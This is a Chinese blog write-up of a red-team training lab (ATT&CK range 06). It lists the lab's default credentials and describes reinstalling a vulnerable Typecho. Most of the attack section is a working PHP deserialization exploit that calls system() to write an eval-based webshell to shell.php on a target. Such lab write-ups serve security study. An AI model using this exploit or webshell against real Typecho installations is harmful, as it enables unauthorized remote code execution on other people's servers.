ATT-CK红队实战靶场06

发表于 2022-08-23 更新于 2022-08-25 分类于打靶阅读次数：

环境配置

首先是WEB它有3个快照分别对应的是iis、weblogic、typechoCMS
接着是linux就开放了一个22端口，服务嘛啥也没有

1
2
3

V3.2
web\de1ay | 1qaz!QAZ1qaz!QAZ
de1ay\de2ay | 1qaz@WSX!QAZ2wsx

首先要进入web靶机启动phpstudy，它这里ip是写死的静态ip，如果要修改需要进入web\de1ay账号修改ip设置

扫下端口开放情况，只开发了80,3306，这里的80使用phpstudy起的一个typecho

打开发现报错

进入靶机打开phpstudy启动服务，先关闭iis，在删除网站根目录的config.inc.php，重新安装typecho，先进入数据库新建一个typecho的库，然后访问如下url，进行重新安装

然后又报了一个类错误，直接从官网从新下一个，2017年10月24日之前的所有版本都存在此靶场要利用的漏洞

外网打点

typecho反序列化前台getshell

exp

<?php
    class Typecho_Request
    {
        private $_params = array();
        private $_filter = array();

        public function __construct()
        {
            $this->_params['screenName'] = 'echo ^<?php @eval($_POST["b1ank"]);?^>>shell.php'; // 执行的参数值
            $this->_filter[0] = 'system'; //filter执行的函数
        }
    }
    class Typecho_Feed{
        const RSS2 = 'RSS 2.0'; //进入toString内部判断条件
        private $_items = array();
        private $_type;
        function __construct()
        {
            $this->_type = self::RSS2;
            $_item['author'] = new Typecho_Request(); //Feed.php文件中触发__get()方法使用的对象
        $_item['category'] = array(new Typecho_Request());//触发错误
            $this->_items[0] = $_item;
        }
    }
    $exp = new Typecho_Feed();
    $a = array(
        'adapter'=>$exp, // Db.php文件中触发__toString()使用的对象
        'prefix' =>'typecho_'
    );
    echo urlencode(base64_encode(serialize($a)));
?>